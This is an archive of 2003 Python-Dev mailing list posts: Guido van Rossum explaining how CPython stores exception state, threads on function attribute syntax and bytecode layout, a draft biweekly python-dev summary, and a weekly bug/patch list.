From guido@python.org  Sat Mar  1 01:52:58 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Feb 2003 20:52:58 -0500
Subject: [Python-Dev] Traceback problem
In-Reply-To: "Your message of Wed, 26 Feb 2003 03:40:11 +0100."
 <3E5C290B.9010802@tismer.com>
References: <Pine.LNX.4.44.0302251816460.15794-100000@penguin.theopalgroup.com>
 <200302260124.h1Q1O7D16232@pcp02138704pcs.reston01.va.comcast.net>
 <3E5C290B.9010802@tismer.com>
Message-ID: <200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net>

(Picking up an old thread.)

[Guido]
> > Watch out though.  There are situations where an exception needs
> > to be stored but no frame is available (when executing purely in
> > C).  There is always a thread state.

[Christian]
> I've been sitting a while over this puzzle now.
> 
> tstate has two different kinds of exceptions:
> There are tstate->exc_XXX and tstate->curexc_XXX.
> 
> I have been searching through the whole source trunk
> to validate my thought:
> 
> All internal stuff is only concerned with handling
> tstate->curexc_XXX.

Correct.  This is the "hot" exception that is set by PyErr_SetString()
c.s., cleared by PyErr_Clear(), and so on.

> The tstate->exc_XXX is *only* used in ceval.c .

Once an exception is caught by an except clause, it is transferred
from tstate->curexc_XXX to tstate->exc_XXX, from which sys.exc_info()
can pick it up.

> References to tstate->exc_XXX are only in
> pystate.c (clearing stuff) and sysmodule.c (accessing stuff).
> The only place where tstate->exc_XXX is filled with life
> is ceval.c, which indicates that this is purely interpreter-
> -related and has nothing to do with the internal exception
> state. It is eval_frame which checks for exceptions, normalizes
> them and turns them into interpreter-level exceptions,
> around line 2360 of ceval.c .

Correct.

> After stating that, I conclude that tstate.exc_XXX can only
> be in use if there is an existing interpreter with an existing
> frame. Nobody else makes use of this structure.
> So, whenever you have to save this, you can expect a valid
> frame waiting in f_back that will be able to take it.

Right.  Now let me explain the complicated dance with
frame->f_exc_XXX.  Long ago, when none of this existed, there were
just a few globals: one set corresponding to the "hot" exception, and
one set corresponding to sys.exc_type etc.  The problem was that in
code like this:

   try:
      "something that may fail"
   except "some exception":
      "do something else first"
      "print the exception from sys.exc_type etc."

if "do something else first" invoked something that raised and caught
an exception, sys.exc_type etc. were overwritten.  That was a frequent
cause of subtle bugs.  I fixed this by changing the semantics as
follows:

  - Within one frame, sys.exc_XXX will hold the last exception caught
    *in that frame*.

  - But initially, and as long as no exception is caught in a given
    frame, sys.exc_XXX will hold the last exception caught in the
    previous frame (or the frame before that, etc.).

The first bullet fixed the bug in the above example.  The second
bullet was for backwards compatibility: it was (and is) common to
have a function that is called when an exception is caught, and to
have that function access the caught exception via sys.exc_XXX.
(Example: traceback.print_exc()).

At the same time I fixed the problem that sys.exc_type and friends
weren't thread-safe, by introducing sys.exc_info() which gets it from
tstate; but that's really a separate improvement.

The reset_exc_info() function in ceval.c restores the tstate->exc_XXX
variables to what they were before the current frame was called.  The
set_exc_info() function saves them on the frame so that
reset_exc_info() can restore them.  The invariant is that
frame->f_exc_XXX is NULL iff the current frame never caught an
exception (where "catching" an exception applies only to successful
except clauses); and if the current frame ever caught an exception,
frame->f_exc_XXX is the exception that was stored in tstate->exc_XXX
at the start of the current frame.

Now I hope you'll understand why this was never documented
exactly. :-)

> (This all under the maybe false assumption that I'm not wrong).

No; I guess I was wrong in the quoted text at the top. :-)

> Still not proposing a change. But thanks for the time,
> I understood quite a lot more of the internals, now.

Great!  Hope this message has shed some additional light.

Kevin, I'll try to get to your patch next.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tjreedy@udel.edu  Sat Mar  1 03:25:25 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Fri, 28 Feb 2003 22:25:25 -0500
Subject: [Python-Dev] Re: Traceback problem
References: <Pine.LNX.4.44.0302251816460.15794-100000@penguin.theopalgroup.com> <200302260124.h1Q1O7D16232@pcp02138704pcs.reston01.va.comcast.net> <3E5C290B.9010802@tismer.com> <200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <b3p95n$bd8$1@main.gmane.org>

"Guido van Rossum" <guido@python.org> wrote in message
news:200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net.
..
[explanation of traceback info storage]
> Great!  Hope this message has shed some additional light.

It would be a shame for this to be lost in the archives.  If there
were a directory of  ImplementationNotes somewhere (or an interpreter
wiki), this would belong there.  And responders to "where are the docs
on the implementation" could be told more than "read the source".

TJR


From guido@python.org  Sat Mar  1 03:40:55 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Feb 2003 22:40:55 -0500
Subject: [Python-Dev] Re: Traceback problem
In-Reply-To: "Your message of Fri, 28 Feb 2003 22:25:25 EST."
 <b3p95n$bd8$1@main.gmane.org>
References: <Pine.LNX.4.44.0302251816460.15794-100000@penguin.theopalgroup.com>
 <200302260124.h1Q1O7D16232@pcp02138704pcs.reston01.va.comcast.net>
 <3E5C290B.9010802@tismer.com>
 <200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net>
 <b3p95n$bd8$1@main.gmane.org>
Message-ID: <200303010340.h213etD23813@pcp02138704pcs.reston01.va.comcast.net>

> > Great!  Hope this message has shed some additional light.
> 
> It would be a shame for this to be lost in the archives.  If there
> were a directory of  ImplementationNotes somewhere (or an interpreter
> wiki), this would belong there.  And responders to "where are the docs
> on the implementation" could be told more than "read the source".

Good idea.  I hate separating implementation notes from the code by
more than absolutely necessary (Zope's cobweb of Wikis drives me nuts
:-), so I added the essence of that message to ceval.c as a big
comment block.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Sat Mar  1 04:06:20 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 28 Feb 2003 22:06:20 -0600
Subject: [Python-Dev] Re: Traceback problem
In-Reply-To: <b3p95n$bd8$1@main.gmane.org>
References: <Pine.LNX.4.44.0302251816460.15794-100000@penguin.theopalgroup.com>
 <200302260124.h1Q1O7D16232@pcp02138704pcs.reston01.va.comcast.net>
 <3E5C290B.9010802@tismer.com>
 <200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net>
 <b3p95n$bd8$1@main.gmane.org>
Message-ID: <15968.12732.65507.874387@montanaro.dyndns.org>

    Terry> [explanation of traceback info storage]
    >> Great!  Hope this message has shed some additional light.

    Terry> It would be a shame for this to be lost in the archives.  If
    Terry> there were a directory of ImplementationNotes somewhere (or an
    Terry> interpreter wiki), this would belong there.  

Feel free to add it to

    http://manatee.mojam.com/pyvmwiki

Skip


From niemeyer@conectiva.com  Sat Mar  1 08:00:43 2003
From: niemeyer@conectiva.com (Gustavo Niemeyer)
Date: Sat, 1 Mar 2003 05:00:43 -0300
Subject: [Python-Dev] [663074] Codec registry
Message-ID: <20030301080043.GA28745@ibook.distro.conectiva>

Can someone please review the proposed solution to bug #663074?

If accepted, should it be backported to 2.2.3 as well?

-- 
Gustavo Niemeyer

[ 2AAC 7928 0FBF 0299 5EB5  60E2 2253 B29A 6664 3A0C ]


From mwh@python.net  Sat Mar  1 11:12:21 2003
From: mwh@python.net (Michael Hudson)
Date: Sat, 01 Mar 2003 11:12:21 +0000
Subject: [Python-Dev] syntax for funcion attributes
In-Reply-To: <006101c2df5b$5bbc72d0$a502200a@mnotlaptop> ("Mark
 Nottingham"'s message of "Fri, 28 Feb 2003 10:58:11 -0800")
References: <006101c2df5b$5bbc72d0$a502200a@mnotlaptop>
Message-ID: <2mznofwdbe.fsf@starship.python.net>

"Mark Nottingham" <mnot@mnot.net> writes:

> Hello,
>
> I'm not a python-dev regular, so sorry if this is a FAQ. What's the status
> of defining a syntax for function attributes (PEP 232)?

I don't think changes here are likely.

> I'm using __doc__ to carry metadata about methods right now, but
> would very much like to use function attributes. However, without a
> specialized syntax, I'm stuck doing things like
>
> VeryLongMethodName.MetadataName = "foo"
>
> which is fine if it's a one-off, but I'd like others to use the code, and
> this isn't exactly a friendly mechanism.

If PEP <the one I haven't written yet> gets accepted, you'll be able
to do

def with_metadata(func):
    func.metadata = "yes"

def f(blah) [with_metadata]:
    ....

or even 

def with_metadata(data):
    def inner(func):
        func.metadata = data
    return inner

def f(blah) [with_metadata("yes")]:
    ....

Would that suit you?

Cheers,
M.

-- 
  > Why are we talking about bricks and concrete in a lisp newsgroup?
  After long experiment it was found preferable to talking about why
  Lisp is slower than C++...
                        -- Duane Rettig & Tim Bradshaw, comp.lang.lisp


From newsgroups1@bitfurnace.com  Sat Mar  1 22:54:49 2003
From: newsgroups1@bitfurnace.com (Damien Morton)
Date: Sat, 1 Mar 2003 17:54:49 -0500
Subject: [Python-Dev] Re: new bytecode results
References: <001301c2def2$09d374a0$6401a8c0@damien> <3E5F2260.3080808@lemburg.com> <b3o4ti$nsl$1@main.gmane.org>
Message-ID: <b3re2i$rad$1@main.gmane.org>

I just realised that scoring layouts based on adjacency is the traveling
salesman problem, where the distance beteween two opcodes is
freq[op1][op2]+freq[op2][op1], and the goal is to maximise the total
distance traveled.

Solving for 150 or so opcodes is well within reach.


"Damien Morton" <newsgroups1@bitfurnace.com> wrote in message
news:b3o4ti$nsl$1@main.gmane.org...
> > >>c) ordering cases in the switch statements by usage frequency
> > >>    (using average opcode usage frequencs obtained by
> > >>    instrumenting the interpreter)
> > >
> > > I might try a little simulated annealing to generate layouts with high
> > > frequency opcodes near the front and coorcurring opcodes near each
> > > other.
> >
> > I did that by hand, sort of :-) The problem is that the
> > scoring phases takes rather long, so you better start with
> > a good guess.
>
> Im wondering what good scoring scheme would look like.
>
> I tried a scoring scheme in which layouts were scored thusly:
>
> for (i = 0; i < MAXOP; i++)
>     for (j = 0; j < MAXOP; j++)
>         score += pairfreq[layout[i]][layout[j]] * (i < j ? j-i : i-j)
>
> This works fine, but Im thinking that a simpler scoring scheme which looks
> only at the frequencies of adjacent ops might be sufficient, and would
> certainly be faster.
>
> for (i = 1; i < MAXOP; i++)
>     score += pairfreq[layout[i-1]][layout[i]]
>
> The idea is that while caches favour locality of reference, because a
cache
> line is finite in size and relatively small (16 or 64 bytes), there arent
> any long-range effects. In other words, caches favour adjacency of
reference
> rather than locality of reference.


From drifty@alum.berkeley.edu  Sun Mar  2 02:25:28 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Sat, 1 Mar 2003 18:25:28 -0800 (PST)
Subject: [Python-Dev] python-dev from 2003-02-16 through 2003-02-28
Message-ID: <Pine.SOL.4.53.0303011823560.502@death.OCF.Berkeley.EDU>

Since this is falling on the weekends, you guys have until Monday night to
tell me how I fouled up.

+++++++++++++++++++++++++++++++++++++++++++++++++++++
python-dev Summary for 2003-02-16 through 2003-02-28
+++++++++++++++++++++++++++++++++++++++++++++++++++++

.. _comp.lang.python:
.. _rest:
.. _last summary:

======================
Summary Announcements
======================

Nothing specific about the Summary to mention.  I am starting to lean more
and more towards starting summaries out in Quickies_ and then making them
a full-fledged summary when they end up requiring more than a short
paragraph of explanation.  Helps me keep my sanity since I plan on
sticking with having some summarization for every thread on python-dev.

But this summary is on the lean side because traffic was lower than
normal.  I am sure this is in reaction to what happened last month with
the massive amount of emails and various negativity that sprung up around
the list.  Made my life easier.  =)

PyCon_ is moving forward!  Early-bird registration is over, but regular
registration for $200 is still available.  It has already shaped up to be
a fun conference.  If you come you can hear me make a fool of myself
trying to teach the conference reST_.  =)

T-shirts are also available so even if you don't go to the conference you
can buy a shirt at http://www.cafeshops.com/pycon and fool people into
thinking your went.  =)

As for the `pre-PyCon sprint`_, that is also shaping up.  There is already
a sprint for Zope_, Twisted_, and Webware_.  And now there is a sprint in
the works for working on the Python core!  If you are interested just
<XXX: waiting for Guido to tell me how he wants to be contacted>.

.. _PyCon: http://www.python.org/pycon/
.. _pre-PyCon sprint: http://www.python.org/cgi-bin/moinmoin/SprintPlan
.. _Zope: http://www.zope.org/
.. _Twisted: http://twistedmatrix.com/
.. _Webware: http://webware.sourceforge.net/


===========================
`RELEASED: Python 2.3a2`__
===========================
__ http://mail.python.org/pipermail/python-dev/2003-February/033537.html

Guido released `Python 2.3a2`_ on Feb. 19.  Please download it, run the
regression tests, and then test some of your own code.  The more bugs we
can squash before we hit 2.3b1 the better.

.. _Python 2.3a2: http://www.python.org/2.3/


===================================
`new format codes for getargs.c`__
===================================
__ http://mail.python.org/pipermail/python-dev/2003-February/033579.html

Thomas Heller implemented a new 'k' format code for `getargs.c`_ that
ccepts integers or longs, does no range checking, and returns the lower
bits in an unsigned long".  After Tim Peters said that tests should be
added to `_testcapimodule.c`_ the conversation was moved over to
http://www.python.org/sf/595026 .

.. _getargs.c:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Python/getargs.c
.. __testcapimodule.c:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Modules/_testcapimodule.c


=====================================
`assymetry in descriptor behavior`__
=====================================
__ http://mail.python.org/pipermail/python-dev/2003-February/033583.html

This summary is going to assume you understand descriptor's.  If you don't
read `What's New in 2.2`_ for a nice, simple overview or `PEP 252`_ for
the technical explanation (the initial email for this thread has simple
code showing how descriptor's are used).  If you have ever been interested
how property(), classmethod(), and staticmethod() work this will tell you.

David Abrahams wondered why it was possible to invoke a descriptor's
__get__() from either the class it is defined in or an instance of that
class while __set__() for the same descriptor cannot be called from the
class directly without having defined the descriptor a second time in the
metaclass; David thought this was a little difficult.  He also asked about
the arguments to the descriptor API methods.

Guido responded by saying that it wasn't difficult considering you could
do it and that Python was pulling something off with a single notation (by
using '.' for class and instance accesses) that C++ uses two notations for
('.' and '::').  As for the arguments to the various methods, they are as
follows:

__get__(self, obj, type)
    'self' gets bound to the descriptor instance.  When called for an
class, obj = None while for an instance it is bound to the instance
containing the descriptor.  'type' is set to the class that has the
descriptor regardless of what context the descriptor is being called.  The
duality is so that descriptors can be happy being called either just on an
instance or just a class (such as classmethod()).

__set__(self, obj, value)
    'self' is the descriptor, obj is the instance, and 'value' is what
what the assignment is being passed.  As mentioned above, this only works
with classes if you create the descriptor *twice*; once in the class and
once in the class's metaclass.

__delete__(self, obj)
    Guess what gets bound to these parameters?  =)  A historical note:
Guido said "In an early alpha release it was actually __del__, but that
didn't work very well. :-)" for obvious reasons.

David also submitted a doc patch for this so we are now one step closer to
having new-style classes documented.  Still, there is work to be done and
if you care to help please do so.

.. _What's New in 2.2:
http://www.python.org/doc/2.2.1/whatsnew/sect-rellinks.html#SECTION000320000000000000000
.. _PEP 252: http://www.python.org/peps/pep-0252.html


======================
`Bytecode analysis`__
======================
__ http://mail.python.org/pipermail/python-dev/2003-February/033663.html

Splinter threads:
    - `Bytecode idea
<http://mail.python.org/pipermail/python-dev/2003-February/033693.html>`__
    - `Code Generation Idea
<http://mail.python.org/pipermail/python-dev/2003-February/033692.html>`__
    - `Dynamic bytecode analysis
<http://mail.python.org/pipermail/python-dev/2003-February/033752.html>`__
    - `new bytecode results
<http://mail.python.org/pipermail/python-dev/2003-February/033775.html>`__

Damien Morton posted some opcode statistics and tried to get better
performance out of `ceval.c`_ by coming up with a way to do a LOAD_FAST_n
call (LOAD_FAST pushes a variable on to the stack) and to cut back on the
size of .pyc files.  Nothing panned out very much, though (all the
benchmarking was done using Pystone_).

Guido said that Christian Tismer's idea of changing some of the
rarely-used opcodes to function calls and moving them out of the 'switch'
statement might get some performance.

Christian also thought that some work could be done to speed up calls that
involve a ``goto fast_next_opcode`` call.

Changing ceval.c to using a jump table instead of a switch also did not
pan out.

Jeremy Hylton spoke to let people know that sometimes having an opcode
call out to a function is not necessarily slower then having the code in
the switch statement.  He said it depended on how much work the opcode had
to do and "lots of other hard-to-predict effects" in terms of memory and
generated machine code.

Jeremey also reminded people that there is patch out there to use the
Pentium's cycle counter to find out how many cycles is spent on each pass
through the mainloop.

Guido also said that "If you really want fame and fortune, try designing a
more representative benchmark".  AM Kuchling requested to be notified when
someone decided to take on this project.

Skip Montanaro pointed out that he has "an XML-RPC server available to
which applications can connect and upload their dynamic opcode
frequencies" at http://manatee.mojam.com:7304 .  Compile with
"DYNAMIC_EXCUTION_PROFILE and DXPAIRS defined" and fetch the info from the
sys_ module (it's undocumented, but it looks like you can get execution
info from sys.getdxp()).  If you are interested in how to use Skip's
server, see
http://mail.python.org/pipermail/python-dev/2003-February/033767.html .

Damien Morton made his modified source code available at
http://www.bitfurnace.com/python/modified-source.zip and asked people give
it a try and report back to him their results.

Dan Sugalski suggested putting opcode that tends to execute in pairs
closer together so that they would have a better chance of being in the
cache.  It seemed that doing any mass opcode adding made things slower
since the switch got larger and thus made cache hits harder to come by.
Various ideas of how to rearrange things so that the switch was not as
large were suggested and are most likely still being tested.

.. _ceval.c:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Python/ceval.c
.. _Pystone:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Lib/test/pystone.py
.. _sys:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Python/sysmodule.c


=========
Quickies
=========

`CALL_ATTR, A Method Proposal
<http://mail.python.org/pipermail/python-dev/2003-February/033410.html>`__
    Finn Bock added one last comment to this thread from the `last
summary`_ about how the proposed implementation of a CALL_ATTR bytecode
was how Jython_ handled attribute calls.

`[Python-checkins] python/dist/src/Misc NEWS,1.660,1.661
<http://mail.python.org/pipermail/python-dev/2003-February/033466.html>`__:
`Package Install Manager for Python
<http://mail.python.org/pipermail/python-dev/2003-February/033467.html>`__
   We learn some people take offense to the word pimp (to the point of
considering them rapists), while others think it is fine ("a pretty
respectable profession [in Amsterdam].  Definitely higher standing than a
cab driver, somewhat on par with a coffeeshop owner").

`incorrect regression tests
<http://mail.python.org/pipermail/python-dev/2003-February/033469.html>`__
    Neal Norwitz discovered some regresssion tests that weren't being
executed.  We also learn that it is best for regression test modules to
define a test_main() function that executes all the tests then having the
tests run as a side-effect of importation (prevents the import lock from
being held).

`non-binary operators
<http://mail.python.org/pipermail/python-dev/2003-February/033470.html>`__
    Hold-over from the `last summary`_ when discussing whether the ternary
operator could be just chained binary operators.

`Import lock knowledge required!
<http://mail.python.org/pipermail/python-dev/2003-February/033436.html>`__
    Another hold-over from the `last summary`_; Eric Jones says he
wouldn't mind more fine-grained import locking.

`various unix platform build/test issues
<http://mail.python.org/pipermail/python-dev/2003-February/033482.html>`__
    Neal Norwitz brought to the attention of python-dev some issues that
were preventing Python from compiling on some platforms.

`308: the debate is petering out
<http://mail.python.org/pipermail/python-dev/2003-February/033484.html>`__
    Samuele Pedroni posted some new stats on the `PEP 308`_ debate going
on at `comp.lang.python`_.

`[rfc] map enhancement
<http://mail.python.org/pipermail/python-dev/2003-February/033486.html>`__
    Ludovic Aubry proposed a change to map(), but his use-case was
eliminated quickly when it was pointed out he could just rewrite his map()
or use list comprehensions.

`Python 2.3a2 release today?
<http://mail.python.org/pipermail/python-dev/2003-February/033489.html>`__
    Guido asked if anyone objected to releasing Python 2.3a2 on Feb. 18.
Jack Jansen asked if Guido could wait a day and he said yes.

`test_timeout fails on Win98SE
<http://mail.python.org/pipermail/python-dev/2003-February/033515.html>`__
    The title of the thread states what the issue was and it got resolved.

`privacy in log files?
<http://mail.python.org/pipermail/python-dev/2003-February/033530.html>`__
    Guido discovered a comment about not using `PyErr_WarnExplicit()`_
because there was a worry of having code put into a log file.  Discussion
seemed to end on the idea that it wasn't so much security but throwing a
text editor for a loop because of possible non-ASCII getting put into a
log file.

`What happened to fixed point?
<http://mail.python.org/pipermail/python-dev/2003-February/033539.html>`__
    David LeBlanc asked about the status of FixedPoint_ getting into the
stdlib.  Raymond Hettinger said he would be getting to it soon.

`test_posix, test_random failing
<http://mail.python.org/pipermail/python-dev/2003-February/033541.html>`__
    I bet you can figure out what this thread is about.  SF tracker items
have now been created.

`pickling of large arrays
<http://mail.python.org/pipermail/python-dev/2003-February/033543.html>`__
    Ralf Grosse-Kunstle asked if there was a way to minimize the amount of
buffering needed to buffer an array object.  It was pointed out that
writing a __reduce__() method that used an iterator would prevent the need
to do any major buffering.  The idea of having a custom append() method
for objects to return was also suggested, but didn't get resolved.

`Cygwin build failing
<http://mail.python.org/pipermail/python-dev/2003-February/033555.html>`__
    A problem with builing under Cygwin was fixed by rebasing the system.

`2.3a2 problem: iconv module raising RuntimeError
<http://mail.python.org/pipermail/python-dev/2003-February/033570.html>`__
    `_iconv_codec.c`_ was raising RuntimeError when it was more proper to
raise ImportError.  It's been fixed.

`SCO Open Server 5.0.x thread support
<http://mail.python.org/pipermail/python-dev/2003-February/033575.html>`__
    Someone asked for help compiling on SCO with thread support.  He was
redirected to `comp.lang.python`_ to get help.

`call for Windows developers
<http://mail.python.org/pipermail/python-dev/2003-February/033582.html>`__
    Thomas Heller asked for help from some Windows experts with the goal
of getting ctypes_ so that one can write ActiveX controls in Python.

`tuning up...
<http://mail.python.org/pipermail/python-dev/2003-February/033585.html>`__
    Andrew MacIntyre sent some performance numbers for OS/2 EMX; about 10%
performance improvement from Python 2.2 with -O compared to stock Python
2.3 (-O in 2.3 does not do much since the SET_LINENO opcode was removed
entirely from Python).

`Weekly Python Bug/Patch Summary
<http://mail.python.org/pipermail/python-dev/2003-February/033586.html>`__
    Skip Montanaro's weekly reminder that Python is not perfect yet.  =)

`Needed: regexp maintainer
<http://mail.python.org/pipermail/python-dev/2003-February/033590.html>`__
    Guido asked for someone to step forward to take over for the re_
module.

`_iconv_codec
<http://mail.python.org/pipermail/python-dev/2003-February/033602.html>`__
    Guido asking what that `_iconv_codec.c`_ module was for (answer: it's
a wrapper for the iconv(3) POSIX module).

`python/dist/src configure,1.279.6.17...
<http://mail.python.org/pipermail/python-dev/2003-February/033596.html>`__
    Neil Schemenauer asked what the whitespace rules were for
pre-processor directives (e.g., #include, #define, etc.).  Tim Peters (the
residential C standards know-it-all) said that "Spaces and horizontal tabs
are fine before '#', and between '#' and the directive name".

`rename bsddbmodule.c to bsddb185.c
<http://mail.python.org/pipermail/python-dev/2003-February/033645.html>`__
    `bsddbmodule.c`_ is now going to compile to the module bsddb185.

`Scheduled downtime for mail.python.org
<http://mail.python.org/pipermail/python-dev/2003-February/033651.html>`__
    mail.python.org was scheduled to go down on 2003-02-26 at 10:00 EST.

`Traceback problem
<http://mail.python.org/pipermail/python-dev/2003-February/033607.html>`__
    Christian Tismer wanted a way to clear the traceback information
stored by `sys.exc_info()`_ to be cleared on-demand since it is kept
around as long as the frame is alive.  Kevin Jacobs wrote a patch to
implement this feature and named is sys.exc_clear().  And a word of
warning to anyone who stores the info returned by sys.exc_info(); it
creates a cycle with the frame and thus can create a huge chunk of memory
to be held so make sure to delete the info when you are done with it.

`module extension search order - can it be changed?
<http://mail.python.org/pipermail/python-dev/2003-February/033626.html>`__
    Skip Montanaro realized that most failed stat() calls occur because
the extension search order goes C extension and then Python module; most
modules are written in Python and thus the stat() call for a C extension
of a module name tends to fail.  Guido said it is this way so that if the
build of a C extension fails a same-named Python module can be installed
instead.  This also lead to Skip possibly coming up with a build option of
creating a zip archive of the stdlib at install time to minimize failed
stat() calls.

`Writing a mutable object problem with __setattr__
<http://mail.python.org/pipermail/python-dev/2003-February/033627.html>`__
    Aleksandor Totic asked about classes and an object-persistence setup
he was designing.  You can learn about __setattr__() and that do find out
whether an instance is new-style or classic based on whether it has a
__class__ attribute (new-style has this).

`Re: some preliminary timings
<http://mail.python.org/pipermail/python-dev/2003-February/033634.html>`__
    Skip Montanaro discovering that importing email_ takes a while.

`GIL Pep commentary
<http://mail.python.org/pipermail/python-dev/2003-February/033657.html>`__
    David Abrahams basically saying he likes `PEP 311`_.

`test_re failing again on Mac OS X
<http://mail.python.org/pipermail/python-dev/2003-February/033668.html>`__
    Someone thought `test_re`_ was failing again on OS X when it turns out
it was an isolated incident.

`Slowdown in Python CVS
<http://mail.python.org/pipermail/python-dev/2003-February/033756.html>`__
    Someone thought that Python had slowed down for some reason; turned
out to be isolated.  If you ever need to check out a CVS copy from a past
date, execute ``cvs update -D '24 Feb 2003'`` (with the proper date, of
course).

`Some questions about maintenance of the regular expression code.
<http://mail.python.org/pipermail/python-dev/2003-February/033699.html>`__:
`New regex syntax?
<http://mail.python.org/pipermail/python-dev/2003-February/033735.html>`__
    Gary Herron stepped up to say he was interested in taking over
maintenance of the re_ module.  He asked, though, how to handle bug
reports about ``(.*)?`` and hitting the recursion limit (a patch
materialized that solved the recursion issue for non-greedy quantifiers
for the common case).  The suggestion of coming up with a new syntax for
regexes came up but was stopped from forming on the list since that would
take "over all available bandwidth in python-dev" as Guido pointed out.
Can still be discussed in other forums, though...

`bug? classes whose metclass has __del__ are not collectible
<http://mail.python.org/pipermail/python-dev/2003-February/033764.html>`__
    Answer: no.  Reason: "The GC implementation has a good reason for
this; someone else may be able to explain it".

`Introducing Python
<http://mail.python.org/pipermail/python-dev/2003-February/033783.html>`__
    Gustavo Niemeyer sent a link to an mpeg promoting Python at
http://www.ibiblio.org/obp/pyBiblio/pythonvideo.php .  If you ever had any
desire to see what some of the guys from PythonLabs look and sound like
and you are not going to PyCon_ you can now quench your curiosity.

`syntax for funcion attributes
<http://mail.python.org/pipermail/python-dev/2003-February/033800.html>`__
    Someone suggested a new syntax for being to access function attributes
but was told that it didn't look like it would fly.


.. _Jython: http://www.jython.org/
.. _PEP 308: http://www.python.org/peps/pep-0308.html
.. _PyErr_WarnExplicit():
http://www.python.org/dev/doc/devel/api/exceptionHandling.html#l2h-92
.. _FixedPoint: http://fixedpoint.sf.net/
.. __iconv_codec.c:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Modules/_iconv_codec.c?sortby=date
.. _ctypes: http://starship.python.net/crew/theller/ctypes.html
.. _re: http://www.python.org/dev/doc/devel/lib/module-re.html
.. _bsddbmodule.c:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Modules/bsddbmodule.c
.. _sys.exc_info():
http://www.python.org/dev/doc/devel/lib/module-sys.html
.. _email: http://www.python.org/dev/doc/devel/lib/module-email.html
.. _PEP 311: http://www.python.org/peps/pep-0311.html
.. _test_re:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Lib/test/test_re.py


From tismer@tismer.com  Sun Mar  2 03:24:28 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sun, 02 Mar 2003 04:24:28 +0100
Subject: [Python-Dev] Re: Traceback problem
In-Reply-To: <200303010340.h213etD23813@pcp02138704pcs.reston01.va.comcast.net>
References: <Pine.LNX.4.44.0302251816460.15794-100000@penguin.theopalgroup.com> <200302260124.h1Q1O7D16232@pcp02138704pcs.reston01.va.comcast.net> <3E5C290B.9010802@tismer.com> <200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net> <b3p95n$bd8$1@main.gmane.org> <200303010340.h213etD23813@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E61796C.4070505@tismer.com>

Guido van Rossum wrote:
> Great!  Hope this message has shed some additional light.

It would of course, two years earlier.
When I wrote my message, I already had triple-checked
that there was no way to contradict me :-)

> It would be a shame for this to be lost in the archives.  If there
> were a directory of  ImplementationNotes somewhere (or an interpreter
> wiki), this would belong there.  And responders to "where are the docs
> on the implementation" could be told more than "read the source".

Put the whole message into the comments, and all is just fine.

> Good idea.  I hate separating implementation notes from the code by
> more than absolutely necessary (Zope's cobweb of Wikis drives me nuts
> :-), so I added the essence of that message to ceval.c as a big
> comment block.

Hey, that's just great!
Guess how often I had to re-read that code,
finally concluding that it is all-right that
way, but always thinking that I could have
saved quite some time by taking some notes :-)

The hardest thing to remember always was the fact
that the callee is saving the caller's state for
the exceptions. I always have to go through analysis
again to get it right, and I always think this is
not the way it should be.

but-this-keeps-me-young -- cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From skip@manatee.mojam.com  Sun Mar  2 13:00:30 2003
From: skip@manatee.mojam.com (Skip Montanaro)
Date: Sun, 2 Mar 2003 07:00:30 -0600
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200303021300.h22D0Un0002864@manatee.mojam.com>

Bug/Patch Summary
-----------------

342 open / 3393 total bugs (-16)
125 open / 1999 total patches (+5)

New Bugs
--------

Let assign to as raise SyntaxWarning as well (2003-02-23)
	http://python.org/sf/691733
LibRef 4.2.1: {m,n} description update (2003-02-23)
	http://python.org/sf/692016
tkinter.createfilehandler dumps core (2003-02-24)
	http://python.org/sf/692416
new.function() leads to segfault (2003-02-25)
	http://python.org/sf/692776
python always searches python23.zip (2003-02-25)
	http://python.org/sf/692884
new.function ignores keyword arguments (2003-02-25)
	http://python.org/sf/692959
Python does not build --with-pydebug on Tru64 with vendor cc (2003-02-25)
	http://python.org/sf/693094
2.3a2 site.py non-existing dirs (2003-02-25)
	http://python.org/sf/693255
2.3a2 import after os.chdir difference (2003-02-25)
	http://python.org/sf/693416
licence allowed, but doesn't work (2003-02-25)
	http://python.org/sf/693470
Can't multiply str and bool (2003-02-26)
	http://python.org/sf/693955
email.Parser trashes header (2003-02-26)
	http://python.org/sf/693996
os.popen() hangs on {Free,Open}BSD (2003-02-26)
	http://python.org/sf/694062
Python 2.3a2 Build fails on HP-UX11i (2003-02-27)
	http://python.org/sf/694431
setup.py imports pwd before it's built if HOME not set (2003-02-27)
	http://python.org/sf/694812
complex_new does not always respect subtypes (2003-03-01)
	http://python.org/sf/695651
Problems with non-greedy match groups (2003-03-01)
	http://python.org/sf/695688

